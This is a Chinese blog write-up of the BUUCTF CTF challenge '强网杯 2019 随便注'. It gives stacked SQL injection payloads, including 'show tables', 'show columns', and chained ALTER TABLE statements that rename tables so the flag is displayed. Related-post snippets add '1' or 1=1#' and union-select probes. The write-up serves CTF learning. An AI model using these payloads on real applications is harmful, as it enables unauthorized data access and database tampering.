buuctf [强网杯 2019]随便注

最新推荐文章于 2024-05-19 20:09:45 发布
最新推荐文章于 2024-05-19 20:09:45 发布
阅读量163 收藏
点赞数
文章标签: 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61554462/article/details/126445767
版权

1.查看所有数据库

0' show databases;#

 2.查看当前库

0' ;select databases;#

禁用了一些命令,无碍

3.查看所有表

0' ;show tables;#

 

 当前库有两个表,接下来分别查看两个表

4.1查看第一个表内容

0'; show columns from `1919810931114514`; #

或者   desc 表名  也可以

 

显然这个表中有flag(注:表名是数字引用须反引号,键盘左上角)

4.2查看第二个表内容

0'; show columns from words; #

 这个表有两列id,data

5.当前结构

 

浅分析一下,默认页面输出的数据绝对不是来自flag的那个表,相反只能来自words那张表,对应输入id数字,返回data"hahaha"啥的

现在任务,让页面显示flag那张表的内容,可以把flag那张表改造成新的words表来输出

6.构造更改flag表

 改表名,填加id列,改变flag列为data

0'; alter table words rename to w;

alter table `1919810931114514` rename to words;

alter table words add id int unsigned primary key;

alert table words change flag data varchar(100);#

 

 注意几个点,

1.一定要一次注入完所有语句,第一次想一句一句注入,第二句注入就报错了,因为接收你注入的id所在表被改名已经找不到了,接下来注入也找不到地方了,,,只好重启了,焯

2.一定要先改掉原本words的表名,如果先把另一个改为words就会同时存在两个words表,这样是改不成的

東个咙咚呛
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BUUCTF-练习场-WEB-第一部分(8道)
weixin_45908624的博客
02-15 1941
BUUCTF-WEB 8道题
BUUCTF学习笔记-随便
weixin_42271850的博客
03-08 2847
BUUCTF学习笔记-随便 时间:2020/03/05 考点:堆叠入、SQL预编译语句。          打开发现是一个输入查询框,右键查看代码发现里面又一个提示sqlmap是没有灵魂的。估计这一题是SQL入,但提示应该不能直接用sqlmap,但还是先去尝试一下。  &nbsp...
buuctf 强网杯 2019 随便1
m0_63883187的博客
01-13 86
buuctf赛题日常解题
BUUCTF [强网杯 2019]随便
m0_63253040的博客
03-28 773
这题和[SUCTF 2019]EasySQL类似,都可以使用堆叠入 参考wp 用1' or 1=1#可以爆出所有表内容 先尝试联合查询入 过滤了select,where等等,使用堆叠入 再看表 看下1919810931114514表 发现flag在里面,但是没办法查询,先看看word表 可以看见有字段id和data,这里应猜测查询语句 selsect id,data from words where id = 根据查询语句来改掉字段的名字 ...
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
BUUCTF强网杯 2019随便1 write up
GZWZ_的博客
04-06 4759
回显flag有好几种方法,但我只会一种┭┮﹏┭┮,如果有大佬会其他的,可不可以call我呢
buuctf [强网杯 2019]随便 1
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
BUUCTF WEB 强网杯 2019 随便
Ethan552525的博客
07-15 481
1:题目 2:解题 2.1:尝试点提交 url变为:http://b61f33a4-644b-402a-9da5-4bdf8043f954.node4.buuoj.cn/?inject=1 可知传入的参数名为 inject,参数为1。 2.2:尝试万能钥匙 输入:1' or '1'='1';# 可得到所有数据,但没有flag。 2.3:尝试联合查询 输入:1' union select 1,2;# ...
BUUCTF-强网杯2019随便 write up(笔记系列)
m0_62851980的博客
04-03 1646
打开靶机,输入万能密码1'or1=1;# 来查看所有内容: 万能密码原理: 万能密码能够绕过sql检测,在sql数据库中,运算符也是有优先级的,=优先于and,and优先于or,简单来说1=‘1’恒成立,因此返回值永远为True,且在SQL语法中 # 是释符,所以后面的语句都会杯释掉。 通过万能密码我们看到所有回显,以及所有信息,不过这样我们无法提取有用信息,所以下面我们输入1' union seclect 1,2 #回显一个正则过滤规则: 回显的正则过滤规则: 用1'...
BUUCTF】[强网杯 2019]随便 1
qq_45972928的博客
05-06 3889
这是一个典型的sql入题目 知识点: 1、入点检测 2、万能匹配 3、暴力获得数据表和其属性 4、sql语句的掌握(order by; union select; rename table; alter table…等等) 1、进入网站 2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况 经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示 3、测试是否存在入 and 1=1和and 1=2没有变化 在参数后面加单引号,发现错误,可以尝试进行入 4、尝试0‘ or
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
mysql事务(原理)
m0_74347016的博客
05-19 612
mysql事务原理
python学习-使用pandas库分析excel表,并导出所需的表
SixSix的自留地
05-16 497
使用pandas库分析excel表中多个子表的数据
实战项目技术点(1)
qq_60396437的博客
05-15 1175
分页插件PageHelper 是 Mybatis 的一款功能强大、方便易用的分页插件,支持任何形式的单标、多表的分页查询。官网:https://pagehelper.github.io/。文件上传,是指将本地图片、视频、音频等文件上传到服务器,供其他用户浏览或下载的过程。
Oracle表空间管理
最新发布
weixin_46593978的博客
05-19 706
假设某张表的PCTFREE为20,PCTUSED为40,这就表示当一个BLOCK的空间使用率达到80%(100-PCTFREE)时,这个BLOCK就不再被允许INSERT新的数据了,而保留下来的这20%(PCTFREE)空间将会被预留为UPDATE可能发生的空间扩展,同时该BLOCK从FREE LIST中移除。需要意的是,Oracle 9i创建表空间时默认使用手动段管理方式,Oracle 9i及之前的低版本中自动段管理方式还有较多BUG,所以不推荐使用。此外只有本地管理的表空间才能使用自动段管理方式。
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值